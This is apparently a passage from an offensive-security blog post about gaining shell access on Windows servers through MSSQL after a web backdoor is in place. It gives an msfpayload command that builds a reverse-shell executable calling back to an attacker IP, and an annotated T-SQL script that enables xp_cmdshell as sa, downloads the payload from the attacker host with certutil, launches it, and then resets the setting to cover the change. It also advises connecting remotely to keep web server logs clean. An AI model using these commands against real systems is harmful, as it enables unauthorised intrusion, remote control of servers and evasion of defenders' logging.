But these only get the job done on Linux servers. What about Windows servers?
- Using the "sa" account (or any other sysadmin login) to execute OS commands from an MSSQL query via the 'xp_cmdshell' extended stored procedure.
- Using a meterpreter payload to get a reverse shell from the target machine.
- Using browser_autopwn. (Really...)
- Using other tools like pwdump7, mimikatz, etc.
With the sa account we can log into the MSSQL server either locally (through our web backdoor) or remotely, provided the port the instance listens on (1433 by default) is reachable from our host. I would recommend remote access because it does not generate web server log entries, which would otherwise fill the log with the path of our web backdoor. Keep in mind that the SQL Server side can still record logins, depending on the instance's login-auditing setting.
msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe
(The X option writes a Windows executable. windows/shell_reverse_tcp gives a plain cmd.exe shell; windows/meterpreter/reverse_tcp is the Meterpreter equivalent. msfpayload has since been removed from Metasploit, and msfvenom generates the same payloads. Whichever tool is used, a listener must be waiting on 172.16.104.130 port 31337 before the executable is launched on the target, and that address must be reachable from the target.)
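The xp_cmdshell route from the list above, combined with the reverse-shell executable generated by the command above, as an added T-SQL example that is not part of the original post. It assumes a sysadmin login (sa), that the attacker host 172.16.104.130 serves /tmp/1.exe over HTTP on port 8000 (a hypothetical choice, e.g. a simple web server started in /tmp), that certutil is available on the target, and that the SQL Server service account can write to C:\Windows\Temp:

```sql
-- Added example (not from the original post): enable xp_cmdshell as "sa",
-- then use it to fetch and launch the reverse-shell payload.
-- Assumed: attacker host 172.16.104.130 serves /tmp/1.exe on HTTP port 8000,
-- certutil exists on the target, and C:\Windows\Temp is writable by the
-- SQL Server service account. Adjust host, port and paths to your engagement.

-- 1. Confirm we really are sysadmin; xp_cmdshell needs that (or an explicit grant).
SELECT SYSTEM_USER AS login_name, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 2. Check whether xp_cmdshell is already enabled (run_value = 1 in the result).
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell';

-- 3. Enable it if needed. Caveat: this writes a line to the SQL Server error log
--    ("Configuration option 'xp_cmdshell' changed from 0 to 1 ..."), so a
--    defender watching that log will see it.
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 4. Sanity check: xp_cmdshell runs as the SQL Server service account
--    (or the proxy account if one is configured), not as the sa login.
EXEC xp_cmdshell 'whoami';

-- 5. Fetch the payload and start it. The download output is returned as rows;
--    the payload is launched through "start" (no /B) so it gets its own console
--    and xp_cmdshell does not block waiting for the shell's inherited stdout.
EXEC xp_cmdshell 'certutil -urlcache -split -f http://172.16.104.130:8000/1.exe C:\Windows\Temp\1.exe';
EXEC xp_cmdshell 'start "" C:\Windows\Temp\1.exe';

-- 6. Optional: put the setting back so the change is not visible in sp_configure.
--    (The error-log entry from step 3 remains; a second entry is written here.)
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
```

Run this from any MSSQL client connected as sa, remotely per the recommendation above; the listener on 172.16.104.130:31337 must already be up when step 5 executes, otherwise the payload exits immediately and you get to repeat the download-and-start step. If step 1 reports is_sysadmin = 0, xp_cmdshell and sp_configure will both fail, and the other techniques in the list are the fallback.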
Credits: Deepankar Arora